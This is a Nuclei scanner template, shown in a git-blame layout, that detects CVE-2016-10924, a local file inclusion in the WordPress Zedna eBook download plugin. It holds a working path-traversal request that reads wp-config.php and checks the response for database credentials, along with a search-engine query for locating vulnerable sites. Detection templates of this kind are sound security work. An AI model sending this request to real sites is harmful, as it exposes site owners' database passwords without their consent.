2021-11-24 21:51:36 +00:00
|
|
|
id: CVE-2016-10924
|
2021-11-24 12:58:55 +00:00
|
|
|
|
|
|
|
info:
|
2022-06-09 15:47:43 +00:00
|
|
|
name: Wordpress Zedna eBook download <1.2 - Local File Inclusion
|
2021-11-24 12:58:55 +00:00
|
|
|
author: idealphase
|
|
|
|
severity: high
|
2022-06-20 16:09:16 +00:00
|
|
|
description: |
|
|
|
|
Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.
|
2023-09-06 13:22:34 +00:00
|
|
|
remediation: |
|
|
|
|
Update to the latest version of the plugin to fix the vulnerability.
|
2021-11-24 12:58:55 +00:00
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
|
|
|
|
- https://www.exploit-db.com/exploits/39575
|
2021-11-24 21:51:36 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-10924
|
2022-06-20 17:58:28 +00:00
|
|
|
- https://wordpress.org/plugins/ebook-download/#developers
|
2021-11-24 21:58:12 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-11-24 21:58:12 +00:00
|
|
|
cve-id: CVE-2016-10924
|
|
|
|
cwe-id: CWE-22
|
2023-10-17 17:52:26 +00:00
|
|
|
epss-score: 0.01079
|
|
|
|
epss-percentile: 0.82641
|
2023-09-06 13:22:34 +00:00
|
|
|
cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:*
|
2022-07-11 17:25:16 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: zedna_ebook_download_project
|
|
|
|
product: zedna_ebook_download
|
2023-09-06 13:22:34 +00:00
|
|
|
framework: wordpress
|
|
|
|
google-query: inurl:"/wp-content/plugins/ebook-download"
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,wordpress,edb,cve2016,wp-plugin,lfi,ebook,wp,wpscan
|
2021-11-24 12:58:55 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-11-24 12:58:55 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "DB_NAME"
|
|
|
|
- "DB_PASSWORD"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|